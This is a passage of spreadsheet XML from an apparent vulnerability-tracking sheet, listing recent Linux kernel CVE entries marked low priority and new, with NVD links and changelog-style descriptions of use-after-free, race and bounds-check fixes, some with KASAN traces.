      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q684" s="5" t="inlineStr"/>
      <c r="R684" s="5" t="inlineStr"/>
      <c r="S684" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/omap: dsi: Do not copy isr table
To be able to unregister stuff from isrs, the corresponding table was
copied.  Nobody seems to unregister stuff that way, so it does not help.
But there are stack-allocated objects passed to these isrs giving chances
of UAF of these objects if irqs are unregistered while they are handled,
so better do not copy that table.</t>
        </is>
      </c>
      <c r="T684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90316</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90317</t>
        </is>
      </c>
      <c r="D685" s="5" t="inlineStr"/>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q685" s="5" t="inlineStr"/>
      <c r="R685" s="5" t="inlineStr"/>
      <c r="S685" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Invalidate RCU pointers after final spin unlock
In a sleepable BPF program, a spin lock can provide the only RCU protection
for a kptr. The final bpf_spin_unlock() ends that protection, but the
verifier leaves the pointer valid. Another CPU can then free the object
before the pointer is used. A capability-limited runtime PoC triggered a
task_struct use-after-free in __bpf_get_task_stack().
Record whether the program is in an RCU-protected context before releasing
the lock. Invalidate RCU-protected pointers only when the unlock leaves the
final such context. This preserves valid pointers in non-sleepable programs
and inside an explicit RCU read-side section.</t>
        </is>
      </c>
      <c r="T685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90317</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90318</t>
        </is>
      </c>
      <c r="D686" s="5" t="inlineStr"/>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="inlineStr"/>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr"/>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q686" s="5" t="inlineStr"/>
      <c r="R686" s="5" t="inlineStr"/>
      <c r="S686" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fat: release buffer head after rebuilding parent
fat_scan_logstart() leaves the matching directory entry's buffer head in
sinfo.bh for the caller to release, just like fat_scan().
fat_rebuild_parent() uses the directory entry to rebuild the parent inode
for the nostale_ro NFS export path, but does not release sinfo.bh after a
successful scan.  Release it once fat_build_inode() has consumed the
directory entry data.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90318</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90319</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rapidio: clear mport-&gt;net when rio_add_net() fails
rio_alloc_net() stores the newly allocated rio_net in mport-&gt;net before
rio_scan_alloc_net() registers the device.
If rio_add_net() fails, rio_scan_alloc_net() drops the device reference
with put_device(), which releases the rio_net through the device release
callback.  However, mport-&gt;net is left pointing at the freed object.
A later mport unregister path can then dereference the dangling mport-&gt;net
pointer and may try to free the same rio_net again.
Clear mport-&gt;net in the rio_add_net() failure path, matching the cleanup
done for the destID table allocation failure path.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90319</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90320</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate external xattr entries when reading metadata
ocfs2_validate_xattr_block() checks the xattr block header before the
block reaches higher-level xattr users, but it does not verify that a
non-indexed block's xh_count and entry offsets fit inside the block. 
Indexed buckets likewise reach list/get consumers after ECC without an
entry-bounds check.
Use the flat xattr entry validator for non-indexed external xattr blocks,
and use a bucket-specific validator for indexed buckets at metadata read
time.  The bucket validator keeps the entry array bounded by the first
bucket block while checking name/value offsets against the bucket block
they target.
Reject corrupted external xattr metadata before listxattr() or getxattr()
can walk out-of-range entry arrays or name/value offsets.
Validation reproduced this kernel report:
BUG: KASAN: use-after-free in ocfs2_xattr_list_entries+0xd7/0x190
Read of size 1 at addr ffff88810a654007 by task ocfs2_xattr_lis/630
Call Trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  kasan_report+0xe0/0x110
  ocfs2_xattr_list_entries+0xd7/0x190
  ocfs2_listxattr+0x3f6/0x610
  listxattr+0x90/0xe0
  path_listxattrat+0xed/0x220
  do_syscall_64+0x115/0x6a0
  entry_SYSCALL_64_after_hwframe+0x77/0x7f</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90320</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90321</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate inline xattrs during inode block validation
Patch series "ocfs2: validate xattr entry bounds", v7.
This series validates OCFS2 xattr entry name/value bounds when xattr
metadata is read and validated, before getxattr() or listxattr() can walk
out-of-range entry arrays or offsets from corrupted metadata.
This patch (of 2):
ocfs2_validate_inode_block() verifies a dinode before OCFS2 users walk
metadata from it, but inline xattr metadata is still checked only in
operation-specific consumers.  The existing ibody lookup helper validates
inline header placement and entry count, but inode block validation does
not reject entry name/value bounds.
Add a flat xattr entry validator and call it from inode block validation
for inline xattrs.  Keep the operation paths on their existing
header/count lookup checks; the full entry bounds check now runs when the
inode block is validated at read time.
Reject corrupted inline xattr metadata before ocfs2_xattr_ibody_get() or
listxattr() can walk past the inline storage.
Validation reproduced this kernel report:
BUG: KASAN: use-after-free in ocfs2_xattr_find_entry+0x5a/0x170
Read of size 2 at addr ffff8881242a2000 by task python3/529
Call Trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  kasan_report+0xe0/0x110
  ocfs2_xattr_find_entry+0x5a/0x170
  ocfs2_xattr_get_nolock+0x20a/0x820
  ocfs2_xattr_get+0x10c/0x1e0
  __vfs_getxattr+0xe2/0x130
  vfs_getxattr+0x185/0x1b0</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90321</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90322</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2/cluster: keep heartbeat local node stable
o2nm_node_local_store() handles local=0 by stopping o2net and setting
cl_local_node to O2NM_INVALID_NODE_NUM, but it leaves cl_has_local set. 
That stale state makes o2nm_this_node() return 255, blocks a later local=1
attempt with -EBUSY, and can feed 255 to heartbeat users that call
o2nm_this_node() dynamically.
Clearing cl_has_local is required when the local node is reset.  But
heartbeat threads can still be running at that point.  They pin the local
node config item at startup, yet o2hb_do_disk_heartbeat() and thread
teardown re-read o2nm_this_node() for the local slot and for
o2nm_undepend_this_node().  Once local=0 has cleared the live local-node
state, those dynamic reads return O2NM_MAX_NODES, which is also the
invalid node number 255.
Store the local node number in the heartbeat region when the region
starts.  Use that stable node for heartbeat slot writes/checks,
negotiation messages, and the final configfs undepend.  Stop the heartbeat
loop when the current local node no longer matches the stored node, and
clear cl_has_local together with cl_local_node in the local=0 path so
nodemanager state matches node removal.
Validation reproduced this kernel report:
KASAN slab-out-of-bounds in o2hb_do_disk_heartbeat+0x372/0xb30
RIP: 0010:memset+0xf/0x20
Read of size 8
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xd0/0x630
  o2hb_do_disk_heartbeat+0x372/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  srso_alias_return_thunk+0x5/0xfbef5
  __virt_addr_valid+0x188/0x2f0
  kasan_report+0xe4/0x120
  o2hb_do_disk_heartbeat+0x5/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  o2hb_thread+0x14e/0x770
  kthread_affine_node+0x139/0x180
  lockdep_hardirqs_on_prepare+0xda/0x190
  trace_hardirqs_on+0x18/0x130
  kthread+0x19d/0x1e0
  ret_from_fork+0x37a/0x4d0
  __switch_to+0x2d5/0x6f0
  ret_from_fork_asm+0x1a/0x30</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90322</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90323</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: validate auto buf reg before taking uring_cmd
With UBLK_F_AUTO_BUF_REG, invalid sqe-&gt;addr can fail after
ublk_fill_io_cmd() has set UBLK_IO_FLAG_ACTIVE. The uring_cmd is
completed while the tag stays active, which can hang teardown.
Split validation from buffer apply so the check has no side effects,
then take the uring_cmd and store the already-validated buffer. Apply
the same order in FETCH so io-&gt;buf is not written before __ublk_fetch()
state checks.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90323</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90324</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ublk: check import_ubuf() return value
import_ubuf() can fail if the address range (provided by the userspace
ublk server) is outside the allowed user address space. Return that 0
bytes were copied if import_ubuf() fails rather than passing an
uninitialized struct iov_iter to ublk_copy_user_pages().</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90324</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90325</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-cgroup: skip dying blkg in blkcg_activate_policy()
When switching IO schedulers on a block device, blkcg_activate_policy()
can race with concurrent blkcg deletion, leading to a use-after-free in
rcu_accelerate_cbs.
T1:                               T2:
                                  blkg_destroy
                                  kill(&amp;blkg-&gt;refcnt) // blkg-&gt;refcnt=1-&gt;0
                                  blkg_release // call_rcu(__blkg_release)
                                  ...
                                  blkg_free_workfn
                                  -&gt;pd_free_fn(pd)
elv_iosched_store
elevator_switch
...
iterate blkg list
blkg_get(blkg) // blkg-&gt;refcnt=0-&gt;1
                                  list_del_init(&amp;blkg-&gt;q_node)
blkg_put(pinned_blkg) // blkg-&gt;refcnt=1-&gt;0
blkg_release // call_rcu again
rcu_accelerate_cbs // uaf
Fix this by checking hlist_unhashed(&amp;blkg-&gt;blkcg_node) before getting
a reference to the blkg. This is the same check used in blkg_destroy()
to detect if a blkg has already been destroyed. If the blkg is already
unhashed, skip processing it since it's being destroyed.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90325</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90326</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
blk-cgroup: fix race between policy activation and blkg destruction
When switching an IO scheduler on a block device, blkcg_activate_policy()
allocates blkg_policy_data (pd) for all blkgs attached to the queue.
However, blkcg_activate_policy() may race with concurrent blkcg deletion,
leading to use-after-free and memory leak issues.
The use-after-free occurs in the following race:
T1 (blkcg_activate_policy):
  - Successfully allocates pd for blkg1 (loop0-&gt;queue, blkcgA)
  - Fails to allocate pd for blkg2 (loop0-&gt;queue, blkcgB)
  - Enters the enomem rollback path to release blkg1 resources
T2 (blkcg deletion):
  - blkcgA is deleted concurrently
  - blkg1 is freed via blkg_free_workfn()
  - blkg1-&gt;pd is freed
T1 (continued):
  - Rollback path accesses blkg1-&gt;pd-&gt;online after pd is freed
  - Triggers use-after-free
In addition, blkg_free_workfn() frees pd before removing the blkg from
q-&gt;blkg_list. This allows blkcg_activate_policy() to allocate a new pd
for a blkg that is being destroyed, leaving the newly allocated pd
unreachable when the blkg is finally freed.
Fix these races by extending blkcg_mutex coverage to serialize
blkcg_activate_policy() rollback and blkg destruction, ensuring pd
lifecycle is synchronized with blkg list visibility.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90326</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90327</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phonet: pep: do not write beyond optlen in getsockopt
pep_getsockopt() clamps the reported length to the caller's buffer with
min_t(), but then stores the value with put_user(val, (int __user *)
optval), which always writes sizeof(int) bytes. A getsockopt() call with
an optlen smaller than sizeof(int) thus reports the clamped length yet
writes a full int, one to three bytes past the user buffer.
Write the value with copy_to_user() bounded by len, so at most optlen
bytes are copied, matching the length reported back to userspace.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90327</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90328</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: steam: Reject short reads
Steam Controller FEATURE reports encode the size of the message in the
message itself. Previously we were trusting that the size reported matched
the size we actually read, leading to a potential issue with short reads.
Instead, we should actually verify the length of the read.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90328</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90329</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: synchronize input before cleaning up a failed probe
hid_device_io_start() allows reports to run concurrently with probe. If
the probe subsequently fails, __hid_device_probe() releases driver
resources and clears hdev-&gt;driver without first excluding those report
callbacks.
For example, a report may enter hidraw_report_event() while the failure
path frees the associated hidraw object, leading to a use-after-free when
the report takes the object's list lock.
Stop input before performing failed-probe cleanup. This reacquires
driver_input_lock and waits for any report callback already in progress.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90329</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90330</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
